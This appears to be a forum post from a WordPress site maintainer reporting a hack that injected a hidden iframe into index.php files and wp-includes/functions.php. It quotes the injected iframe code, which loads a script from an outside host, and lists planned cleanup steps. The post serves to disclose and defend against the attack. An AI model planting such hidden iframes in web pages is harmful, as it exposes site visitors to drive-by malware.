This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.
The specfic hack code is:
<iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>
This code often overwrites the ending php tags in the file and thus brings the site down.
I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:
- Gauge how often it's happening
- Share solutions
- Expose the culprits, if possible
- Alert WP team so they can review possible core level security measures
As to remedies and security measures to take, the other threads have given some good advise, and I plan to sweep my machine and those of other team members with FTP access (could be virus attached to our systems), check recent plugins, scan for virus' on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do same.
Here are the other useful threads I have found: